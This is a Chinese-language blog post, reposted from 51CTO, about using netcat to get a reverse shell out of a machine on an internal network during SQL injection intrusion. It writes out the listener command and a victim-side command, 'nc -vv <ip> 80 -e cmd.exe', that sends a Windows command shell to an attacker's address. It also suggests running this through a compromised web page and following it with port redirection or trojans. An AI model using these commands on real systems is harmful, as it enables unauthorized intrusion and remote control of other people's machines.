天天看點

nc指令小材大用

nc指令小材大用

simeon

通過本文你可以學到:

1、SQL注入内網滲透的一種思路

2、nc指令的一種好用法

   内網滲透對于網絡安全愛好者,特别是網絡入侵檢測時無疑是一種疼,很多時候我們遇到這種情況隻有采取放棄,其實不然,完全使用另外一種方法來進行突破。很多人多知道nc号稱瑞士軍刀,是一款非常不錯的網絡安全工具,其強大的功能毫不遜于一款遠端控制軟體,隻是我們沒有挖掘其強大的功能而已。本文隻是探讨如何來進行内網突破的思維。下面講講本文對nc的具體用法。

(一)在控制端監聽端口

這個控制端可以是自己的殭屍電腦,可以是在具有獨立IP的網絡計算機上,一定要具有獨立IP,否則無法反彈到該IP位址。使用指令如下:

Nc –vv –l –p port 例如 nc –vv –l –p 80

在控制端監聽端口時,需要注意的是,需要先使用“netstat -an”檢視網絡端口的開放情況(圖1),選擇一個未監聽的端口,一般選擇80,443,446,110,25,23端口為好,當然其他未用端口也可以。

圖1 使用netstat –an 檢視端口開情況

說明:如果控制端已經開放了我們要監聽的端口,那麼我們使用nc監聽該端口不會成功,nc程式會提示錯誤資訊,如果監聽正常,會顯示“Listening on  [any] 80 …….”字樣(圖2)。

圖2 在控制端監聽80端口

(二)在内網計算機開放端口

      在内網計算機上運作“nc –vv ipaddress port –e cmd.exe”,這裡的IPaddress一定是控制端的ip位址,例如控制端的位址為“202.108.33.32”,且80端口未開放,則在内網計算機上運作“nc –vv -202.108.33.32 80 –e cmd.exe”即可。如果一切正常,則會反彈一個dosshell回來,跟cmd指令的運作界面差不多,就象在本機的DOS下操作一樣,非常好用,可以粘貼指令,直接執行指令等(圖3)。使用“net user”指令,可以看到我的賬号“simeon”在其中。

圖3 反彈shell成功

(三)其它運用

本文介紹的是如何使用nc來反彈内網的shell,在sql注入的過程中,很多時候遇到獨立主機是内網IP,及時主機開放了3389也無法連接配接進去,這個時候,一個真正的dosshell就特别重要,通過網頁執行nc指令,提供該内網一個shell,然後執行lcx端口重定向或者執行反彈木馬或者其他指令,無疑是一個很好的解決方法。

(四)結束語

    本文就技術難度來說,并不是很大,nc這個軟體很多朋友都熟悉,可以這麼說,搞網絡安全的沒有不熟悉nc這個軟體的,但是對于nc指令的很多用法,不一定熟悉。想不起來曾經看過的一部電影,其中有這麼一段話,高手就是将一個複雜的動作做到單一和簡單!這跟真正的武林高手一樣,不一定需要太多招式,一刀一劍就可以緻命取勝。網絡安全也是如此,對一個工具要熟能生巧,舉一反三,才能出現更多的用法,更多的新的idea,期待大家新的發現。

 本文轉自 simeon2005 51CTO部落格,原文連結:http://blog.51cto.com/simeon/38498